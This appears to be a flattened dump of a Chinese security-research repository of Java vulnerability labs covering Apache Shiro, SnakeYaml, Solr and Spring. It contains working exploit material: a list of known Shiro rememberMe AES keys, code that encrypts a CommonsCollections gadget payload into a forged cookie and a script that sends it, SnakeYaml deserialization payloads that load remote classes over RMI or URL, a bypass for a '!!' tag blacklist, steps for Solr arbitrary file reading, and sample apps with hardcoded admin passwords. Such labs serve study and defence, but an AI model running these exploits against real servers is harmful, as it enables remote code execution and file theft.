org.apache.shiro.authz.AuthorizationInfo; 6 | import org.apache.shiro.realm.AuthorizingRealm; 7 | import org.apache.shiro.subject.PrincipalCollection; 8 | 9 | public class MainRealm extends AuthorizingRealm { 10 | // 用于授权 11 | 
protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { 12 | // 获取当前授权的用户 13 | return null; 14 | } 15 | 16 | // 用于认证 17 | protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { 18 | // getPrincipal 获取当前用户身份 19 | String username = (String)authenticationToken.getPrincipal(); 20 | // 获取当前用户信用凭证 (其实就是获取密码 密码是 char类型的所以要转一下 21 | String password = new String((char[])authenticationToken.getCredentials()); 22 | // 如果等于就返回对应的用户凭证 23 | if (username.equals("admin") && password.equals("admin")) { 24 | // shiro 会返回一个 AuthenticationInfo 25 | // 当前的realm名字 26 | return new SimpleAuthenticationInfo((Object)username, (Object)password, this.getName()); 27 | } 28 | throw new IncorrectCredentialsException("Username or password is incorrect."); 29 | } 30 | } 31 | 32 | -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/src/main/java/com/shiro/vuln/VulnApplication.java: -------------------------------------------------------------------------------- 1 | package com.shiro.vuln; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class VulnApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(VulnApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- 
/Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/Controller/UserController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/Controller/UserController.class -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/Shiro/MainRealm.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/Shiro/MainRealm.class -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/Shiro/ShiroConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/Shiro/ShiroConfig.class -------------------------------------------------------------------------------- /Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/VulnApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/Shiro权限绕过/target/classes/com/shiro/vuln/VulnApplication.class -------------------------------------------------------------------------------- /Shiro/shiro550/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | 5 | For further reference, please consider the following sections: 6 | 7 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 8 | * [Spring Boot Maven Plugin Reference 
Guide](https://docs.spring.io/spring-boot/docs/2.5.3/maven-plugin/reference/html/) 9 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.5.3/maven-plugin/reference/html/#build-image) 10 | * [Spring Web](https://docs.spring.io/spring-boot/docs/2.5.3/reference/htmlsingle/#boot-features-developing-web-applications) 11 | 12 | ### Guides 13 | 14 | The following guides illustrate how to use some features concretely: 15 | 16 | * [Building a RESTful Web Service](https://spring.io/guides/gs/rest-service/) 17 | * [Serving Web Content with Spring MVC](https://spring.io/guides/gs/serving-web-content/) 18 | * [Building REST services with Spring](https://spring.io/guides/tutorials/bookmarks/) 19 | 20 | -------------------------------------------------------------------------------- /Shiro/shiro550/cc11: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/cc11 -------------------------------------------------------------------------------- /Shiro/shiro550/key.txt: -------------------------------------------------------------------------------- 1 | wGiHplamyXlVB11UXWol8g== 2 | 2AvVhdsgUs0FSA3SDFAdag== 3 | 4AvVhmFLUs0KTA3Kprsdag== 4 | 3AvVhmFLUs0KTA3Kprsdag== 5 | Z3VucwAAAAAAAAAAAAAAAA== 6 | U3ByaW5nQmxhZGUAAAAAAA== 7 | wGiHplamyXlVB11UXWol8g== 8 | 6ZmI6I2j5Y+R5aSn5ZOlAA== 9 | kPH+bIxk5D2deZiIxcaaaA== 10 | 11 | -------------------------------------------------------------------------------- /Shiro/shiro550/payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/payload -------------------------------------------------------------------------------- /Shiro/shiro550/src/main/java/com/firebasky/Shiro550Application.java: -------------------------------------------------------------------------------- 1 | 
package com.firebasky; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class Shiro550Application { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(Shiro550Application.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /Shiro/shiro550/src/main/java/com/firebasky/exp/AESencode.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.exp; 2 | 3 | import com.sun.crypto.provider.AESKeyGenerator; 4 | import com.sun.org.apache.xerces.internal.impl.dv.util.Base64; 5 | import org.apache.shiro.crypto.AesCipherService; 6 | import org.apache.shiro.util.ByteSource; 7 | 8 | import java.io.*; 9 | 10 | 11 | public class AESencode { 12 | public static void main(String[] args) throws Exception { 13 | String path = "cc11"; 14 | byte[] key = Base64.decode("kPH+bIxk5D2deZiIxcaaaA=="); 15 | AesCipherService aes = new AesCipherService(); 16 | ByteSource ciphertext = aes.encrypt(getBytes(path), key); 17 | System.out.printf(ciphertext.toString()); 18 | } 19 | 20 | 21 | public static byte[] getBytes(String path) throws Exception{ 22 | InputStream inputStream = new FileInputStream(path); 23 | ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); 24 | int n = 0; 25 | while ((n=inputStream.read())!=-1){ 26 | byteArrayOutputStream.write(n); 27 | } 28 | byte[] bytes = byteArrayOutputStream.toByteArray(); 29 | return bytes; 30 | } 31 | } -------------------------------------------------------------------------------- /Shiro/shiro550/src/main/java/com/firebasky/exp/Main.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.exp; 2 | 3 | /** 4 | * @author:Firebasky 5 | * 通过多线程方式 6 | * 
ref:http://www.lmxspace.com/2020/08/24/%E4%B8%80%E7%A7%8D%E5%8F%A6%E7%B1%BB%E7%9A%84shiro%E6%A3%80%E6%B5%8B%E6%96%B9%E5%BC%8F/ 7 | */ 8 | public class Main { 9 | public static void main(String[] args) throws Exception{ 10 | try { 11 | System.out.println("正在暴力破解................"); 12 | ScanShiro thread = new ScanShiro(); 13 | thread.start(); 14 | Thread.sleep(20); 15 | thread.interrupt(); 16 | } catch (Exception e) { 17 | e.printStackTrace(); 18 | } 19 | } 20 | 21 | } 22 | -------------------------------------------------------------------------------- /Shiro/shiro550/src/main/java/com/firebasky/exp/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | burp0_url = "http://127.0.0.1:8080/" 4 | burp0_cookies = {"JSESSIONID": "F9644B7DD50F08A6DEF9BD1B22B3999F", "rememberMe": "MgsckemDZpFVm8IxNR19ykC58oTyhbFbQYYuCGKoTW+//7y5HqUuZ52WaCyBzV2Rge7kJkN/ZvMqIIMI7CW04mzYPOJRnTANUWy7i+ijZeCMhdcLo30AwveuynGTuqdu39IDMZqgpSf63NpxcwZUMKd7ul6M4gPkoqaklZDJaMlEdwu/2l6hFtgEMfSq+/63"} 5 | burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} 6 | r=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies) 7 | print(r.headers) -------------------------------------------------------------------------------- /Shiro/shiro550/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Shiro/shiro550/src/test/java/com/firebasky/Shiro550ApplicationTests.java: -------------------------------------------------------------------------------- 1 | package 
com.firebasky; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class Shiro550ApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/Controller/UserController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/Controller/UserController.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/Shiro550Application.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/Shiro550Application.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/exp/AESencode.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/exp/AESencode.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/exp/CommonCollection11.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/exp/CommonCollection11.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/exp/Main.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/exp/Main.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/exp/ScanShiro.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/exp/ScanShiro.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/shiro/MainRealm.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/shiro/MainRealm.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/classes/com/firebasky/shiro/ShiroConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/classes/com/firebasky/shiro/ShiroConfig.class -------------------------------------------------------------------------------- /Shiro/shiro550/target/test-classes/com/firebasky/Shiro550ApplicationTests.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro550/target/test-classes/com/firebasky/Shiro550ApplicationTests.class -------------------------------------------------------------------------------- /Shiro/shiro721/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | 5 | For further reference, please consider the following sections: 6 | 7 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 8 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.5.4/maven-plugin/reference/html/) 9 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.5.4/maven-plugin/reference/html/#build-image) 10 | * [Spring Web](https://docs.spring.io/spring-boot/docs/2.5.4/reference/htmlsingle/#boot-features-developing-web-applications) 11 | 12 | ### Guides 13 | 14 | The following guides illustrate how to use some features concretely: 15 | 16 | * [Building a RESTful Web Service](https://spring.io/guides/gs/rest-service/) 17 | * [Serving Web Content with Spring MVC](https://spring.io/guides/gs/serving-web-content/) 18 | * [Building REST services with Spring](https://spring.io/guides/tutorials/bookmarks/) 19 | 20 | -------------------------------------------------------------------------------- /Shiro/shiro721/src/main/java/com/firebasky/shiro721/Shiro721Application.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.shiro721; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class Shiro721Application { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(Shiro721Application.class, args); 11 | } 12 | 13 | } 14 | 
-------------------------------------------------------------------------------- /Shiro/shiro721/src/main/java/com/firebasky/shiro721/config/MyRealm.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.shiro721.config; 2 | 3 | import org.apache.shiro.authc.AuthenticationToken; 4 | import org.apache.shiro.realm.AuthorizingRealm; 5 | import org.apache.shiro.subject.PrincipalCollection; 6 | 7 | public class MyRealm extends AuthorizingRealm 8 | { 9 | protected org.apache.shiro.authz.AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) 10 | { 11 | return null; 12 | } 13 | 14 | protected org.apache.shiro.authc.AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws org.apache.shiro.authc.AuthenticationException { 15 | String username = (String)token.getPrincipal(); 16 | if (!"admin".equals(username)) { 17 | throw new org.apache.shiro.authc.UnknownAccountException("账户不存在!"); 18 | } 19 | return new org.apache.shiro.authc.SimpleAuthenticationInfo(username, "123456", getName()); 20 | } 21 | } 22 | 23 | -------------------------------------------------------------------------------- /Shiro/shiro721/src/main/java/com/firebasky/shiro721/controllers/LoginController.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.shiro721.controllers; 2 | 3 | import org.apache.shiro.SecurityUtils; 4 | import org.apache.shiro.authc.AuthenticationException; 5 | import org.apache.shiro.subject.Subject; 6 | import org.springframework.web.bind.annotation.GetMapping; 7 | import org.springframework.web.bind.annotation.RestController; 8 | 9 | @RestController 10 | @org.springframework.web.bind.annotation.RequestMapping({"/"}) 11 | public class LoginController 12 | { 13 | @org.springframework.web.bind.annotation.PostMapping({"/doLogin"}) 14 | public void doLogin(String username, String password) 15 | { 16 | Subject subject = 
SecurityUtils.getSubject(); 17 | try { 18 | subject.login(new org.apache.shiro.authc.UsernamePasswordToken(username, password,true)); 19 | //shiro 20 | System.out.println("success"); 21 | } catch (AuthenticationException e) { 22 | e.printStackTrace(); 23 | System.out.println("fail!"); 24 | } 25 | } 26 | 27 | @GetMapping({"/admin/hello"}) 28 | public String hello() { return "hello"; } 29 | 30 | @GetMapping({"/login"}) 31 | public String login() { 32 | return "please login!"; 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /Shiro/shiro721/src/main/java/com/firebasky/shiro721/controllers/index.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.shiro721.controllers; 2 | 3 | import org.springframework.web.bind.annotation.RequestMapping; 4 | import org.springframework.web.bind.annotation.RestController; 5 | 6 | @RestController 7 | @RequestMapping({"/"}) 8 | public class index 9 | { 10 | @RequestMapping({"/index"}) 11 | public String printName(String name) 12 | { 13 | return "Hello!" 
+ name; 14 | } 15 | } -------------------------------------------------------------------------------- /Shiro/shiro721/src/main/java/com/firebasky/shiro721/exp/url.ser: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/src/main/java/com/firebasky/shiro721/exp/url.ser -------------------------------------------------------------------------------- /Shiro/shiro721/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8081 2 | -------------------------------------------------------------------------------- /Shiro/shiro721/src/test/java/com/firebasky/shiro721/Shiro721ApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.firebasky.shiro721; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class Shiro721ApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /Shiro/shiro721/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8081 2 | -------------------------------------------------------------------------------- /Shiro/shiro721/target/classes/com/firebasky/shiro721/Shiro721Application.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/target/classes/com/firebasky/shiro721/Shiro721Application.class -------------------------------------------------------------------------------- /Shiro/shiro721/target/classes/com/firebasky/shiro721/config/MyRealm.class: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/target/classes/com/firebasky/shiro721/config/MyRealm.class -------------------------------------------------------------------------------- /Shiro/shiro721/target/classes/com/firebasky/shiro721/config/ShiroConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/target/classes/com/firebasky/shiro721/config/ShiroConfig.class -------------------------------------------------------------------------------- /Shiro/shiro721/target/classes/com/firebasky/shiro721/controllers/LoginController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/target/classes/com/firebasky/shiro721/controllers/LoginController.class -------------------------------------------------------------------------------- /Shiro/shiro721/target/classes/com/firebasky/shiro721/controllers/index.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/target/classes/com/firebasky/shiro721/controllers/index.class -------------------------------------------------------------------------------- /Shiro/shiro721/target/test-classes/com/firebasky/shiro721/Shiro721ApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Shiro/shiro721/target/test-classes/com/firebasky/shiro721/Shiro721ApplicationTests.class -------------------------------------------------------------------------------- 
/SnakeYaml/SnakeYaml.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /SnakeYaml/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | org.example 8 | SnakeYaml 9 | 1.0-SNAPSHOT 10 | 11 | 12 | 8 13 | 8 14 | 15 | 16 | 17 | 18 | org.yaml 19 | snakeyaml 20 | 1.17 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /SnakeYaml/src/main/java/CVE/gadget.java: -------------------------------------------------------------------------------- 1 | package CVE; 2 | 3 | public class gadget { 4 | public static void main(String[] args) { 5 | String poc = "!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: 'rmi://127.0.0.1:2333/exp', autoCommit: true}"; 6 | String poc1 = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://127.0.0.1:2333/\"]]]]"; 7 | 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /SnakeYaml/src/main/java/learn/Person.java: -------------------------------------------------------------------------------- 1 | package learn; 2 | 3 | import java.sql.PreparedStatement; 4 | import java.time.Period; 5 | 6 | public class Person { 7 | public String name; 8 | 9 | public Person(){ 10 | } 11 | public Person(String name){ 12 | System.out.println(name); 13 | } 14 | 15 | public String getName() { 16 | System.out.println("get方法"); 17 | return name; 18 | } 19 | 20 | public void setName(String name) { 21 | System.out.println("set方法"); 22 | this.name = name; 23 | } 24 | 25 | public int getAge() { 26 | return age; 27 | } 28 | 29 | public void setAge(int age) { 30 | this.age = age; 31 | } 32 | 33 | public int age; 34 | } 35 | -------------------------------------------------------------------------------- /SnakeYaml/src/main/java/learn/test.java: 
-------------------------------------------------------------------------------- 1 | package learn; 2 | 3 | import org.yaml.snakeyaml.Yaml; 4 | 5 | public class test { 6 | /** 7 | * 特点在于它没有黑名单,不能设置私有属性,不能使用构造方法触发的 gadgets。 8 | * @param args 9 | */ 10 | public static void main(String[] args) { 11 | Yaml yaml = new Yaml(); 12 | //Person person = new Person(); 13 | //person.name="giao"; 14 | //person.age=18; 15 | //String dump = yaml.dump(person);//序列化 16 | //System.out.println(dump); 17 | 18 | //String poc1 = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://127.0.0.1:2333/\"]]]]"; 19 | // 20 | //String poc = "!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: 'rmi://127.0.0.1:2333/exp', autoCommit: true}"; 21 | String data = "!!learn.Person [\"18\"]";//调用构造方法 22 | System.out.println(yaml.load(data)); 23 | 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /SnakeYaml/src/main/java/learn/学习.txt: -------------------------------------------------------------------------------- 1 | getClassForName:677, Constructor (org.yaml.snakeyaml.constructor) 2 | getClassForNode:664, Constructor (org.yaml.snakeyaml.constructor) 3 | getConstructor:336, Constructor$ConstructYamlObject (org.yaml.snakeyaml.constructor) 4 | construct:346, Constructor$ConstructYamlObject (org.yaml.snakeyaml.constructor) 5 | constructObject:182, BaseConstructor (org.yaml.snakeyaml.constructor) 6 | constructDocument:141, BaseConstructor (org.yaml.snakeyaml.constructor) 7 | getSingleData:127, BaseConstructor (org.yaml.snakeyaml.constructor) 8 | loadFromReader:450, Yaml (org.yaml.snakeyaml) 9 | load:369, Yaml (org.yaml.snakeyaml) 10 | main:22, test (learn) 11 | 12 | https://www.mi1k7ea.com/2019/11/29/Java-SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/#%E7%9B%B8%E5%85%B3%E5%BA%94%E7%94%A8CVE -------------------------------------------------------------------------------- 
/SnakeYaml/src/main/java/trick/SnakeYaml.java: -------------------------------------------------------------------------------- 1 | package trick; 2 | 3 | /** 4 | * https://b1ue.cn/archives/407.html 5 | */ 6 | 7 | import org.yaml.snakeyaml.Yaml; 8 | 9 | public class SnakeYaml { 10 | public static void main(String[] args) { 11 | String data = "!" + 12 | "!javax.script.ScriptEngineManager [!" + 13 | "!java.net.URLClassLoader [[!" + 14 | "!java.net.URL [\"http://127.0.0.1:2333/\"]]]]"; 15 | //-------------------绕过----------- 16 | //String data = "%TAG ! tag:yaml.org,2002:\n" + 17 | // "---\n" + 18 | // "!javax.script.ScriptEngineManager [!java.net.URLClassLoader [[!java.net.URL [\"http://127.0.0.1:2333/\"]]]]"; 19 | 20 | //String data = "! "+ 21 | // "[! [[!" + 22 | // " [\"http://127.0.0.1:2333\"]]]]"; 23 | 24 | Object parse = SnakeYaml.parse(data,Object.class); 25 | 26 | } 27 | 28 | public static Object parse(String data,Class clazz){ 29 | if(data.indexOf("!!")!=-1){ 30 | throw new RuntimeException("error"); 31 | } 32 | Yaml yaml = new Yaml(); 33 | return yaml.loadAs(data,clazz); 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /SnakeYaml/target/classes/CVE/PoC.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/SnakeYaml/target/classes/CVE/PoC.class -------------------------------------------------------------------------------- /SnakeYaml/target/classes/CVE/gadget.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/SnakeYaml/target/classes/CVE/gadget.class -------------------------------------------------------------------------------- /SnakeYaml/target/classes/learn/Person.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/SnakeYaml/target/classes/learn/Person.class -------------------------------------------------------------------------------- /SnakeYaml/target/classes/learn/test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/SnakeYaml/target/classes/learn/test.class -------------------------------------------------------------------------------- /SnakeYaml/target/classes/trick/SnakeYaml.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/SnakeYaml/target/classes/trick/SnakeYaml.class -------------------------------------------------------------------------------- /Solr/Apache Solr 任意文件读取漏洞/README.md: -------------------------------------------------------------------------------- 1 | # Apache Solr 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件 6 | 7 | ## 漏洞影响 8 | 9 | Apache Solr <= 8.8.1 10 | 11 | ## 搜索 12 | 13 | ``` 14 | FOFA:Apache Solr <= 8.8.1 15 | ``` 16 | 17 | ## 漏洞复现 18 | 见exp 19 | 20 | ## exp 21 | 22 | + 我们的目的是通过信息泄露获得我们想要的路径 23 | + 然后通过路径去访问xxx/config,并且设置配置文件`{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}` 24 | + 最后通过`/solr/xxxx/debug/dump?param=ContentStreams`的post方法去读文件。 25 | -------------------------------------------------------------------------------- /Solr/README.md: -------------------------------------------------------------------------------- 1 | # Apache Solr漏洞 2 | **Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。** 3 | 4 | Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data 
Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 5 | -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219224825746.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219224825746.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219224902858.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219224902858.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219225556986.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219225556986.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219225716796.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219225716796.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219231451748.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219231451748.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219231819148.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219231819148.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219231847037.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219231847037.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219232049395.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219232049395.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219232204534.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219232204534.png -------------------------------------------------------------------------------- /Spring/CVE-2016-4977-spring/CVE-2016-4977.assets/image-20210219232632661.png: 
